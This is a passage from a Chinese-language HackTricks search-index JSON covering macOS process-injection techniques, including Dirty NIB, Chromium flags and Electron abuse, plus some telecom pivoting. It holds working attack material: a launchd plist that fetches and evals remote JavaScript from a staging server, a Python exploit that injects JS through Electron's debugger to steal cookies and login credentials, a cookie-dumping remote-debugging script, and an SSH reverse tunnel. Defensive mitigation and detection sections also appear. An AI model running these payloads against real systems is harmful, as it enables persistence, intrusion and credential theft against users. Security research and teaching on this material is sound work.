应用程序注入","id":"2343","title":".Net 应用程序注入"},"2344":{"body":"检查不同选项以使 Perl 脚本执行任意代码: macOS Perl Applications Injection","breadcrumbs":"macOS Security & Privilege Escalation » macOS Process Abuse » Perl 注入","id":"2344","title":"Perl 注入"},"2345":{"body":"也可以滥用 Ruby 环境变量使任意脚本执行任意代码: macOS Ruby Applications Injection","breadcrumbs":"macOS Security & Privilege Escalation » macOS Process Abuse » Ruby 注入","id":"2345","title":"Ruby 注入"},"2346":{"body":"如果环境变量 PYTHONINSPECT 被设置,Python 进程将在完成后进入 Python CLI。也可以使用 PYTHONSTARTUP 指定在交互会话开始时执行的 Python 脚本。 但是,请注意,当 PYTHONINSPECT 创建交互会话时, PYTHONSTARTUP 脚本不会被执行。 其他环境变量如 PYTHONPATH 和 PYTHONHOME 也可能对执行任意代码的 Python 命令有用。 请注意,使用 pyinstaller 编译的可执行文件即使在使用嵌入式 Python 运行时也不会使用这些环境变量。 caution 总的来说,我找不到通过滥用环境变量使 Python 执行任意代码的方法。 然而,大多数人使用 Homebrew 安装 Python,这将在 可写位置 为默认管理员用户安装 Python。您可以用以下方法劫持它: mv /opt/homebrew/bin/python3 /opt/homebrew/bin/python3.old\\ncat > /opt/homebrew/bin/python3 <\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n 这会在 nib 加载时在目标进程中实现任意 AppleScript 执行。 高级链可以: 实例化任意 AppKit 类(例如 NSTask)并调用像 -launch 这样的无参方法。 通过上面的 binding 技巧使用对象参数调用任意 selector。 加载 AppleScriptObjC.framework 以桥接到 Objective‑C,甚至调用特定的 C API。 在仍包含 Python.framework 的旧系统上,可以桥接到 Python,然后使用 ctypes 调用任意 C 函数(Sector7 的研究)。 替换应用的 nib 将 target.app 复制到可写位置,替换例如 Contents/Resources/MainMenu.nib 为恶意 nib,然后运行 target.app。Pre‑Ventura 下,在一次 Gatekeeper 评估之后,后续启动仅执行浅层签名检查,因此非可执行资源(例如 .nib)不会被重新验证。 Example AppleScript payload for a visible test: applescript set theDialogText to \\"PWND\\"\\ndisplay dialog theDialogText","breadcrumbs":"macOS Security & Privilege Escalation » macOS Process Abuse » macOS Dirty NIB » Dirty NIB injection process (attacker view)","id":"2353","title":"Dirty NIB injection process (attacker view)"},"2354":{"body":"Apple 引入了若干系统性缓解措施,大幅降低了 Dirty NIB 在现代 macOS 上的可行性: 首次启动的深度验证与 bundle 保护 (macOS 13 Ventura) 在任何应用的首次运行时(无论是否被 quarantine),系统会对所有 bundle 资源进行深度签名校验。此后,bundle 会受到保护:只有来自相同开发者(或被应用明确允许)的应用可以修改其内容。其他应用要想写入另一个应用的 bundle,需要新的 TCC “App Management” 权限。 Launch Constraints (macOS 13 Ventura) 系统/Apple 捆绑的应用无法被复制到其他位置并被启动;这封堵了对系统应用使用 “复制到 /tmp、修改、运行” 的方法。 macOS 14 Sonoma 的改进 Apple 强化了 App Management 并修补了已知的绕过(例如由 Sector7 报告的 CVE‑2023‑40450)。Python.framework 在更早的版本被移除(macOS 12.3),这中断了某些提权链。 Gatekeeper/Quarantine 变更 关于 Gatekeeper、provenance 和 assessment 的更广泛讨论以及这些变化如何影响该技术,请参见下方引用的页面。 Practical implication • 在 Ventura 及更高版本中,除非你的进程拥有 App Management 或与目标使用相同 Team ID(例如开发工具),否则通常无法修改第三方应用的 .nib。 • 给 shell/terminal 授予 App Management 或 Full Disk Access 实际上会重新打开这一攻击面,允许任何能在该终端上下文中执行代码的实体利用它。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Process Abuse » macOS Dirty NIB » Modern macOS protections (Ventura/Monterey/Sonoma/Sequoia)","id":"2354","title":"Modern macOS protections (Ventura/Monterey/Sonoma/Sequoia)"},"2355":{"body":"Launch Constraints 从 Ventura 开始阻止从非默认位置运行许多 Apple 应用。如果你此前依赖于 pre‑Ventura 的工作流(例如将 Apple 应用复制到临时目录、修改 MainMenu.nib 然后启动),在 >= 13.0 上预计会失败。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Process Abuse » macOS Dirty NIB » Addressing Launch Constraints","id":"2355","title":"Addressing Launch Constraints"},"2356":{"body":"Locate apps whose UI is nib‑driven: bash find /Applications -maxdepth 2 -name Info.plist -exec sh -c \\\\\\n\'for p; do if /usr/libexec/PlistBuddy -c \\"Print :NSMainNibFile\\" \\"$p\\" >/dev/null 2>&1; \\\\\\nthen echo \\"[+] $(dirname \\"$p\\") uses NSMainNibFile=$( /usr/libexec/PlistBuddy -c \\"Print :NSMainNibFile\\" \\"$p\\" )\\"; fi; done\' sh {} + 在 bundle 中查找候选的 nib 资源: bash find target.app -type f \\\\( -name \\"*.nib\\" -o -name \\"*.xib\\" \\\\) -print 深入验证 code signatures (如果你篡改了资源且没有 re‑sign,会失败): bash codesign --verify --deep --strict --verbose=4 target.app 注意:在现代 macOS 上,尝试在未获得适当授权的情况下写入另一个应用的 bundle,会被 bundle protection/TCC 阻止。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Process Abuse » macOS Dirty NIB » Enumerating targets and nibs (useful for research / legacy systems)","id":"2356","title":"Enumerating targets and nibs (useful for research / legacy systems)"},"2357":{"body":"对 bundle 资源进行文件完整性监控 监控已安装应用中 Contents/Resources/*.nib 及其他非可执行资源的 mtime/ctime 更改。 统一日志与进程行为 监控 GUI 应用中意外的 AppleScript 执行,以及加载 AppleScriptObjC 或 Python.framework 的进程。示例: bash log stream --info --predicate \'processImagePath CONTAINS[cd] \\".app/Contents/MacOS/\\" AND (eventMessage CONTAINS[cd] \\"AppleScript\\" OR eventMessage CONTAINS[cd] \\"loadAppleScriptObjectiveCScripts\\")\' 主动评估 定期对关键应用运行 codesign --verify --deep,以确保资源保持完整。 权限上下文 审计哪些用户/进程拥有 TCC “App Management” 或 Full Disk Access(尤其是终端和管理代理)。将这些权限从通用 shell 中移除,可以防止轻易重新启用 Dirty NIB‑style 的篡改。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Process Abuse » macOS Dirty NIB » 检测与 DFIR 建议","id":"2357","title":"检测与 DFIR 建议"},"2358":{"body":"优先使用编程式 UI 或限制从 nib 实例化的内容。避免在 nib 图中包含强力类(例如 NSTask),并避免会间接对任意对象调用 selectors 的 bindings。 采用带有 Library Validation 的 hardened runtime(现代应用已普遍使用)。虽然这本身无法阻止 nib injection,但它会阻断轻易的本地代码加载,迫使攻击者仅使用脚本型 payloads。 不要在通用工具中请求或依赖广泛的 App Management 权限。如果 MDM 需要 App Management,将该上下文与用户驱动的 shell 隔离开来。 定期验证应用 bundle 的完整性,并使你的更新机制能够自我修复 bundle 资源。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Process Abuse » macOS Dirty NIB » 防御加固(开发者和防御者)","id":"2358","title":"防御加固(开发者和防御者)"},"2359":{"body":"了解更多影响此技术的 Gatekeeper、quarantine 与 provenance 更改: macOS Gatekeeper / Quarantine / XProtect","breadcrumbs":"macOS Security & Privilege Escalation » macOS Process Abuse » macOS Dirty NIB » HackTricks 相关阅读","id":"2359","title":"HackTricks 相关阅读"},"236":{"body":"","breadcrumbs":"Pentesting Network » Telecom Network Exploitation » 4. Pivoting 通过核心网络","id":"236","title":"4. Pivoting 通过核心网络"},"2360":{"body":"xpn – DirtyNIB(原始文章,包含 Pages 示例):https://blog.xpnsec.com/dirtynib/ Sector7 – Bringing process injection into view(s): exploiting all macOS apps using nib files (April 5, 2024): https://sector7.computest.nl/post/2024-04-bringing-process-injection-into-view-exploiting-all-macos-apps-using-nib-files/ tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Process Abuse » macOS Dirty NIB » 参考资料","id":"2360","title":"参考资料"},"2361":{"body":"Reading time: 3 minutes tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Process Abuse » macOS Chromium Injection » macOS Chromium Injection","id":"2361","title":"macOS Chromium Injection"},"2362":{"body":"基于 Chromium 的浏览器,如 Google Chrome、Microsoft Edge、Brave 等。这些浏览器建立在 Chromium 开源项目上,这意味着它们共享一个共同的基础,因此具有类似的功能和开发者选项。 --load-extension 标志 --load-extension 标志用于从命令行或脚本启动基于 Chromium 的浏览器。此标志允许在启动时 自动加载一个或多个扩展 到浏览器中。 --use-fake-ui-for-media-stream 标志 --use-fake-ui-for-media-stream 标志是另一个可以用于启动基于 Chromium 的浏览器的命令行选项。此标志旨在 绕过正常的用户提示,这些提示请求访问来自摄像头和麦克风的媒体流的权限 。使用此标志时,浏览器会自动授予任何请求访问摄像头或麦克风的网站或应用程序权限。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Process Abuse » macOS Chromium Injection » 基本信息","id":"2362","title":"基本信息"},"2363":{"body":"https://github.com/breakpointHQ/snoop https://github.com/breakpointHQ/VOODOO","breadcrumbs":"macOS Security & Privilege Escalation » macOS Process Abuse » macOS Chromium Injection » 工具","id":"2363","title":"工具"},"2364":{"body":"bash # Intercept traffic\\nvoodoo intercept -b chrome 在工具链接中找到更多示例","breadcrumbs":"macOS Security & Privilege Escalation » macOS Process Abuse » macOS Chromium Injection » 示例","id":"2364","title":"示例"},"2365":{"body":"https://twitter.com/RonMasas/status/1758106347222995007 tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Process Abuse » macOS Chromium Injection » 参考","id":"2365","title":"参考"},"2366":{"body":"Reading time: 20 minutes tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Process Abuse » macOS Electron Applications Injection » macOS Electron Applications Injection","id":"2366","title":"macOS Electron Applications Injection"},"2367":{"body":"如果你不知道 Electron 是什么,你可以在 这里找到很多信息 。但现在只需知道 Electron 运行 node 。 而 node 有一些 参数 和 环境变量 可以用来 执行其他代码 ,而不是指定的文件。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Process Abuse » macOS Electron Applications Injection » 基本信息","id":"2367","title":"基本信息"},"2368":{"body":"这些技术将在接下来讨论,但最近 Electron 添加了几个 安全标志以防止它们 。这些是 Electron Fuses ,用于 防止 macOS 中的 Electron 应用 加载任意代码 : RunAsNode :如果禁用,它会阻止使用环境变量 ELECTRON_RUN_AS_NODE 来注入代码。 EnableNodeCliInspectArguments :如果禁用,像 --inspect、--inspect-brk 这样的参数将不被尊重。避免通过这种方式注入代码。 EnableEmbeddedAsarIntegrityValidation :如果启用,加载的 asar 文件 将由 macOS 验证 。以此方式 防止 通过修改该文件的内容进行 代码注入 。 OnlyLoadAppFromAsar :如果启用,它将只检查并使用 app.asar,而不是按以下顺序加载: app.asar 、 app ,最后是 default_app.asar 。因此确保当与 embeddedAsarIntegrityValidation fuse 结合 时, 不可能 加载未验证的代码 。 LoadBrowserProcessSpecificV8Snapshot :如果启用,浏览器进程使用名为 browser_v8_context_snapshot.bin 的文件作为其 V8 快照。 另一个有趣的 fuse 不会阻止代码注入的是: EnableCookieEncryption :如果启用,磁盘上的 cookie 存储将使用操作系统级别的加密密钥进行加密。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Process Abuse » macOS Electron Applications Injection » Electron Fuses","id":"2368","title":"Electron Fuses"},"2369":{"body":"你可以通过以下方式 检查这些标志 : bash npx @electron/fuses read --app /Applications/Slack.app Analyzing app: Slack.app\\nFuse Version: v1\\nRunAsNode is Disabled\\nEnableCookieEncryption is Enabled\\nEnableNodeOptionsEnvironmentVariable is Disabled\\nEnableNodeCliInspectArguments is Disabled\\nEnableEmbeddedAsarIntegrityValidation is Enabled\\nOnlyLoadAppFromAsar is Enabled\\nLoadBrowserProcessSpecificV8Snapshot is Disabled","breadcrumbs":"macOS Security & Privilege Escalation » macOS Process Abuse » macOS Electron Applications Injection » 检查 Electron Fuses","id":"2369","title":"检查 Electron Fuses"},"237":{"body":"OsmoGGSN 提供一个 SGSN 模拟器,能够 establish a PDP context towards a real GGSN/PGW 。 一旦协商完成,Linux 会收到一个新的 tun0 接口,可从漫游对端访问。 bash sgsnemu -g 10.1.1.100 -i 10.1.1.10 -m 40499 -s 404995112345678 \\\\\\n-APN internet -c 1 -d\\nip route add 172.16.0.0/12 dev tun0\\nmicrosocks -p 1080 & # internal SOCKS proxy With proper firewall hair-pinning, this tunnel bypasses signalling-only VLANs and lands you directly in the data plane .","breadcrumbs":"Pentesting Network » Telecom Network Exploitation » 4.1 sgsnemu + SOCKS5","id":"237","title":"4.1 sgsnemu + SOCKS5"},"2370":{"body":"正如 文档提到的 , Electron Fuses 的配置是在 Electron binary 内部配置的,其中包含字符串 dL7pKGdnNz796PbbjQWNKmHXBZaB9tsX 。 在 macOS 应用程序中,这通常位于 application.app/Contents/Frameworks/Electron Framework.framework/Electron Framework bash grep -R \\"dL7pKGdnNz796PbbjQWNKmHXBZaB9tsX\\" Slack.app/\\nBinary file Slack.app//Contents/Frameworks/Electron Framework.framework/Versions/A/Electron Framework matches 您可以在 https://hexed.it/ 中加载此文件并搜索前面的字符串。在此字符串之后,您可以在 ASCII 中看到一个数字 \\"0\\" 或 \\"1\\",指示每个保险丝是禁用还是启用。只需修改十六进制代码(0x30 是 0,0x31 是 1)以 修改保险丝值 。 请注意,如果您尝试 覆盖 应用程序内部的 Electron Framework 二进制文件并修改这些字节,则应用程序将无法运行。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Process Abuse » macOS Electron Applications Injection » 修改 Electron Fuses","id":"2370","title":"修改 Electron Fuses"},"2371":{"body":"可能有 外部 JS/HTML 文件 被 Electron 应用程序使用,因此攻击者可以在这些文件中注入代码,这些文件的签名不会被检查,并在应用程序的上下文中执行任意代码。 caution 但是,目前有 2 个限制: 修改应用程序需要 kTCCServiceSystemPolicyAppBundles 权限,因此默认情况下这不再可能。 编译后的 asap 文件通常具有 embeddedAsarIntegrityValidation 和 onlyLoadAppFromAsar 启用 这使得攻击路径更加复杂(或不可能)。 请注意,可以通过将应用程序复制到另一个目录(如 /tmp ),将文件夹 app.app/Contents 重命名为 app.app/NotCon , 修改 asar 文件以包含您的 恶意 代码,然后将其重命名回 app.app/Contents 并执行它,从而绕过 kTCCServiceSystemPolicyAppBundles 的要求。 您可以使用以下命令从 asar 文件中解压代码: bash npx asar extract app.asar app-decomp 将其打包回来,修改为: bash npx asar pack app-decomp app-new.asar","breadcrumbs":"macOS Security & Privilege Escalation » macOS Process Abuse » macOS Electron Applications Injection » 向 Electron 应用程序添加 RCE 代码","id":"2371","title":"向 Electron 应用程序添加 RCE 代码"},"2372":{"body":"根据 文档 ,如果设置了这个环境变量,它将以普通的 Node.js 进程启动该进程。 bash # Run this\\nELECTRON_RUN_AS_NODE=1 /Applications/Discord.app/Contents/MacOS/Discord\\n# Then from the nodeJS console execute:\\nrequire(\'child_process\').execSync(\'/System/Applications/Calculator.app/Contents/MacOS/Calculator\') caution 如果熔断器 RunAsNode 被禁用,环境变量 ELECTRON_RUN_AS_NODE 将被忽略,这将无法工作。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Process Abuse » macOS Electron Applications Injection » RCE with ELECTRON_RUN_AS_NODE","id":"2372","title":"RCE with ELECTRON_RUN_AS_NODE"},"2373":{"body":"正如 这里提到的 ,您可以在 plist 中滥用这个环境变量以保持持久性: xml \\n\\n\\n\\nEnvironmentVariables\\n\\nELECTRON_RUN_AS_NODE\\ntrue\\n\\nLabel\\ncom.xpnsec.hideme\\nProgramArguments\\n\\n/Applications/Slack.app/Contents/MacOS/Slack\\n-e\\nconst { spawn } = require(\\"child_process\\"); spawn(\\"osascript\\", [\\"-l\\",\\"JavaScript\\",\\"-e\\",\\"eval(ObjC.unwrap($.NSString.alloc.initWithDataEncoding( $.NSData.dataWithContentsOfURL( $.NSURL.URLWithString(\'http://stagingserver/apfell.js\')), $.NSUTF8StringEncoding)));\\"]);\\n\\nRunAtLoad\\n\\n\\n","breadcrumbs":"macOS Security & Privilege Escalation » macOS Process Abuse » macOS Electron Applications Injection » 从应用程序 Plist 注入","id":"2373","title":"从应用程序 Plist 注入"},"2374":{"body":"您可以将有效负载存储在不同的文件中并执行它: bash # Content of /tmp/payload.js\\nrequire(\'child_process\').execSync(\'/System/Applications/Calculator.app/Contents/MacOS/Calculator\'); # Execute\\nNODE_OPTIONS=\\"--require /tmp/payload.js\\" ELECTRON_RUN_AS_NODE=1 /Applications/Discord.app/Contents/MacOS/Discord caution 如果熔断器 EnableNodeOptionsEnvironmentVariable 被 禁用 ,则应用在启动时将 忽略 环境变量 NODE_OPTIONS ,除非环境变量 ELECTRON_RUN_AS_NODE 被设置,如果熔断器 RunAsNode 被禁用,该变量也将被 忽略 。 如果您不设置 ELECTRON_RUN_AS_NODE ,您将会发现 错误 :Most NODE_OPTIONs are not supported in packaged apps. See documentation for more details.","breadcrumbs":"macOS Security & Privilege Escalation » macOS Process Abuse » macOS Electron Applications Injection » RCE with NODE_OPTIONS","id":"2374","title":"RCE with NODE_OPTIONS"},"2375":{"body":"您可以在 plist 中滥用此环境变量以保持持久性,添加以下键: xml \\nEnvironmentVariables\\n\\nELECTRON_RUN_AS_NODE\\ntrue\\nNODE_OPTIONS\\n--require /tmp/payload.js\\n\\nLabel\\ncom.hacktricks.hideme\\nRunAtLoad\\n\\n","breadcrumbs":"macOS Security & Privilege Escalation » macOS Process Abuse » macOS Electron Applications Injection » 从 App Plist 注入","id":"2375","title":"从 App Plist 注入"},"2376":{"body":"根据 这个 的说法,如果你使用 --inspect 、 --inspect-brk 和 --remote-debugging-port 等标志执行 Electron 应用程序,将会 打开一个调试端口 ,这样你就可以连接到它(例如从 Chrome 的 chrome://inspect),并且你将能够 在其上注入代码 ,甚至启动新进程。 例如: bash /Applications/Signal.app/Contents/MacOS/Signal --inspect=9229\\n# Connect to it using chrome://inspect and execute a calculator with:\\nrequire(\'child_process\').execSync(\'/System/Applications/Calculator.app/Contents/MacOS/Calculator\') 在 这篇博客 中,这种调试被滥用,使得无头 Chrome 在任意位置下载任意文件 。 tip 如果一个应用有其自定义的方式来检查环境变量或参数,例如 --inspect 是否设置,你可以尝试在运行时使用参数 --inspect-brk 绕过 它,这将 在应用开始时停止执行 并执行一个绕过(例如,覆盖当前进程的参数或环境变量)。 以下是一个利用监控和执行带有参数 --inspect-brk 的应用的漏洞,通过这种方式可以绕过它的自定义保护(覆盖进程的参数以移除 --inspect-brk),然后注入一个 JS 负载以转储应用的 cookies 和凭据: python import asyncio\\nimport websockets\\nimport json\\nimport requests\\nimport os\\nimport psutil\\nfrom time import sleep INSPECT_URL = None\\nCONT = 0\\nCONTEXT_ID = None\\nNAME = None\\nUNIQUE_ID = None JS_PAYLOADS = \\"\\"\\"\\nvar { webContents } = require(\'electron\');\\nvar fs = require(\'fs\'); var wc = webContents.getAllWebContents()[0] function writeToFile(filePath, content) {\\nconst data = typeof content === \'string\' ? content : JSON.stringify(content, null, 2); fs.writeFile(filePath, data, (err) => {\\nif (err) {\\nconsole.error(`Error writing to file ${filePath}:`, err);\\n} else {\\nconsole.log(`File written successfully at ${filePath}`);\\n}\\n});\\n} function get_cookies() {\\nintervalIdCookies = setInterval(() => {\\nconsole.log(\\"Checking cookies...\\");\\nwc.session.cookies.get({})\\n.then((cookies) => {\\ntokenCookie = cookies.find(cookie => cookie.name === \\"token\\");\\nif (tokenCookie){\\nwriteToFile(\\"/tmp/cookies.txt\\", cookies);\\nclearInterval(intervalIdCookies);\\nwc.executeJavaScript(`alert(\\"Cookies stolen and written to /tmp/cookies.txt\\")`);\\n}\\n})\\n}, 1000);\\n} function get_creds() {\\nin_location = false;\\nintervalIdCreds = setInterval(() => {\\nif (wc.mainFrame.url.includes(\\"https://www.victim.com/account/login\\")) {\\nin_location = true;\\nconsole.log(\\"Injecting creds logger...\\");\\nwc.executeJavaScript(`\\n(function() {\\nemail = document.getElementById(\'login_email_id\');\\npassword = document.getElementById(\'login_password_id\');\\nif (password && email) {\\nreturn email.value+\\":\\"+password.value;\\n}\\n})();\\n`).then(result => {\\nwriteToFile(\\"/tmp/victim_credentials.txt\\", result);\\n})\\n}\\nelse if (in_location) {\\nwc.executeJavaScript(`alert(\\"Creds stolen and written to /tmp/victim_credentials.txt\\")`);\\nclearInterval(intervalIdCreds);\\n}\\n}, 10); // Check every 10ms\\nsetTimeout(() => clearInterval(intervalId), 20000); // Stop after 20 seconds\\n} get_cookies();\\nget_creds();\\nconsole.log(\\"Payloads injected\\");\\n\\"\\"\\" async def get_debugger_url():\\n\\"\\"\\"\\nFetch the local inspector\'s WebSocket URL from the JSON endpoint.\\nAssumes there\'s exactly one debug target.\\n\\"\\"\\"\\nglobal INSPECT_URL url = \\"http://127.0.0.1:9229/json\\"\\nresponse = requests.get(url)\\ndata = response.json()\\nif not data:\\nraise RuntimeError(\\"No debug targets found on port 9229.\\")\\n# data[0] should contain an object with \\"webSocketDebuggerUrl\\"\\nws_url = data[0].get(\\"webSocketDebuggerUrl\\")\\nif not ws_url:\\nraise RuntimeError(\\"webSocketDebuggerUrl not found in inspector data.\\")\\nINSPECT_URL = ws_url async def monitor_victim():\\nprint(\\"Monitoring victim process...\\")\\nfound = False\\nwhile not found:\\nsleep(1) # Check every second\\nfor process in psutil.process_iter(attrs=[\'pid\', \'name\']):\\ntry:\\n# Check if the process name contains \\"victim\\"\\nif process.info[\'name\'] and \'victim\' in process.info[\'name\']:\\nfound = True\\nprint(f\\"Found victim process (PID: {process.info[\'pid\']}). Terminating...\\")\\nos.kill(process.info[\'pid\'], 9) # Force kill the process\\nexcept (psutil.NoSuchProcess, psutil.AccessDenied, psutil.ZombieProcess):\\n# Handle processes that might have terminated or are inaccessible\\npass\\nos.system(\\"open /Applications/victim.app --args --inspect-brk\\") async def bypass_protections():\\nglobal CONTEXT_ID, NAME, UNIQUE_ID\\nprint(f\\"Connecting to {INSPECT_URL} ...\\") async with websockets.connect(INSPECT_URL) as ws:\\ndata = await send_cmd(ws, \\"Runtime.enable\\", get_first=True)\\nCONTEXT_ID = data[\\"params\\"][\\"context\\"][\\"id\\"]\\nNAME = data[\\"params\\"][\\"context\\"][\\"name\\"]\\nUNIQUE_ID = data[\\"params\\"][\\"context\\"][\\"uniqueId\\"] sleep(1) await send_cmd(ws, \\"Debugger.enable\\", {\\"maxScriptsCacheSize\\": 10000000}) await send_cmd(ws, \\"Profiler.enable\\") await send_cmd(ws, \\"Debugger.setBlackboxPatterns\\", {\\"patterns\\": [\\"/node_modules/|/browser_components/\\"], \\"skipAnonnymous\\": False}) await send_cmd(ws, \\"Runtime.runIfWaitingForDebugger\\") await send_cmd(ws, \\"Runtime.executionContextCreated\\", get_first=False, params={\\"context\\": {\\"id\\": CONTEXT_ID, \\"origin\\": \\"\\", \\"name\\": NAME, \\"uniqueId\\": UNIQUE_ID, \\"auxData\\": {\\"isDefault\\": True}}}) code_to_inject = \\"\\"\\"process[\'argv\'] = [\'/Applications/victim.app/Contents/MacOS/victim\']\\"\\"\\"\\nawait send_cmd(ws, \\"Runtime.evaluate\\", get_first=False, params={\\"expression\\": code_to_inject, \\"uniqueContextId\\":UNIQUE_ID})\\nprint(\\"Injected code to bypass protections\\") async def js_payloads():\\nglobal CONT, CONTEXT_ID, NAME, UNIQUE_ID print(f\\"Connecting to {INSPECT_URL} ...\\") async with websockets.connect(INSPECT_URL) as ws:\\ndata = await send_cmd(ws, \\"Runtime.enable\\", get_first=True)\\nCONTEXT_ID = data[\\"params\\"][\\"context\\"][\\"id\\"]\\nNAME = data[\\"params\\"][\\"context\\"][\\"name\\"]\\nUNIQUE_ID = data[\\"params\\"][\\"context\\"][\\"uniqueId\\"]\\nawait send_cmd(ws, \\"Runtime.compileScript\\", get_first=False, params={\\"expression\\":JS_PAYLOADS,\\"sourceURL\\":\\"\\",\\"persistScript\\":False,\\"executionContextId\\":1})\\nawait send_cmd(ws, \\"Runtime.evaluate\\", get_first=False, params={\\"expression\\":JS_PAYLOADS,\\"objectGroup\\":\\"console\\",\\"includeCommandLineAPI\\":True,\\"silent\\":False,\\"returnByValue\\":False,\\"generatePreview\\":True,\\"userGesture\\":False,\\"awaitPromise\\":False,\\"replMode\\":True,\\"allowUnsafeEvalBlockedByCSP\\":True,\\"uniqueContextId\\":UNIQUE_ID}) async def main():\\nawait monitor_victim()\\nsleep(3)\\nawait get_debugger_url()\\nawait bypass_protections() sleep(7) await js_payloads() async def send_cmd(ws, method, get_first=False, params={}):\\n\\"\\"\\"\\nSend a command to the inspector and read until we get a response with matching \\"id\\".\\n\\"\\"\\"\\nglobal CONT CONT += 1 # Send the command\\nawait ws.send(json.dumps({\\"id\\": CONT, \\"method\\": method, \\"params\\": params}))\\nsleep(0.4) # Read messages until we get our command result\\nwhile True:\\nresponse = await ws.recv()\\ndata = json.loads(response) # Print for debugging\\nprint(f\\"[{method} / {CONT}] ->\\", data) if get_first:\\nreturn data # If this message is a response to our command (by matching \\"id\\"), break\\nif data.get(\\"id\\") == CONT:\\nreturn data # Otherwise it\'s an event or unrelated message; keep reading if __name__ == \\"__main__\\":\\nasyncio.run(main()) caution 如果熔断器 EnableNodeCliInspectArguments 被禁用,应用程序将 忽略节点参数 (如 --inspect),除非环境变量 ELECTRON_RUN_AS_NODE 被设置,如果熔断器 RunAsNode 被禁用,该变量也将被 忽略 。 然而,您仍然可以使用 electron 参数 --remote-debugging-port=9229 ,但之前的有效载荷将无法执行其他进程。 使用参数 --remote-debugging-port=9222 可以从 Electron 应用程序中窃取一些信息,如 历史记录 (使用 GET 命令)或浏览器的 cookies (因为它们在浏览器内部 解密 ,并且有一个 json 端点 可以提供它们)。 您可以在 这里 和 这里 学习如何做到这一点,并使用自动工具 WhiteChocolateMacademiaNut 或简单的脚本,如: python import websocket\\nws = websocket.WebSocket()\\nws.connect(\\"ws://localhost:9222/devtools/page/85976D59050BFEFDBA48204E3D865D00\\", suppress_origin=True)\\nws.send(\'{\\\\\\"id\\\\\\": 1, \\\\\\"method\\\\\\": \\\\\\"Network.getAllCookies\\\\\\"}\')\\nprint(ws.recv()","breadcrumbs":"macOS Security & Privilege Escalation » macOS Process Abuse » macOS Electron Applications Injection » RCE with inspecting","id":"2376","title":"RCE with inspecting"},"2377":{"body":"您可以在 plist 中滥用此环境变量以保持持久性,添加以下键: xml \\nProgramArguments\\n\\n/Applications/Slack.app/Contents/MacOS/Slack\\n--inspect\\n\\nLabel\\ncom.hacktricks.hideme\\nRunAtLoad\\n\\n","breadcrumbs":"macOS Security & Privilege Escalation » macOS Process Abuse » macOS Electron Applications Injection » 从应用程序 Plist 注入","id":"2377","title":"从应用程序 Plist 注入"},"2378":{"body":"tip macOS 的 TCC 守护进程不会检查应用程序的执行版本。因此,如果您 无法使用任何先前的技术在 Electron 应用程序中注入代码 ,您可以下载该应用程序的早期版本并在其上注入代码,因为它仍然会获得 TCC 权限(除非信任缓存阻止它)。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Process Abuse » macOS Electron Applications Injection » TCC Bypass abusing Older Versions","id":"2378","title":"TCC Bypass abusing Older Versions"},"2379":{"body":"先前的技术将允许您在 Electron 应用程序的进程中运行 JS 代码 。但是,请记住, 子进程在与父应用程序相同的沙箱配置文件下运行 ,并且 继承它们的 TCC 权限 。 因此,如果您想利用权限访问摄像头或麦克风,例如,您可以直接 从进程中运行另一个二进制文件 。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Process Abuse » macOS Electron Applications Injection » Run non JS Code","id":"2379","title":"Run non JS Code"},"238":{"body":"DNS 在漫游基础设施中几乎总是开放的。 将内部 SSH 服务暴露到你的 VPS(监听 :53),随后可以从家中回连: bash ssh -f -N -R 0.0.0.0:53:127.0.0.1:22 user@vps.example.com 确认 VPS 上已启用 GatewayPorts yes。","breadcrumbs":"Pentesting Network » Telecom Network Exploitation » 4.2 SSH Reverse Tunnel over Port 53","id":"238","title":"4.2 SSH Reverse Tunnel over Port 53"},"2380":{"body":"","breadcrumbs":"macOS Security & Privilege Escalation » macOS Process Abuse » macOS Electron Applications Injection » Notable Electron macOS Vulnerabilities 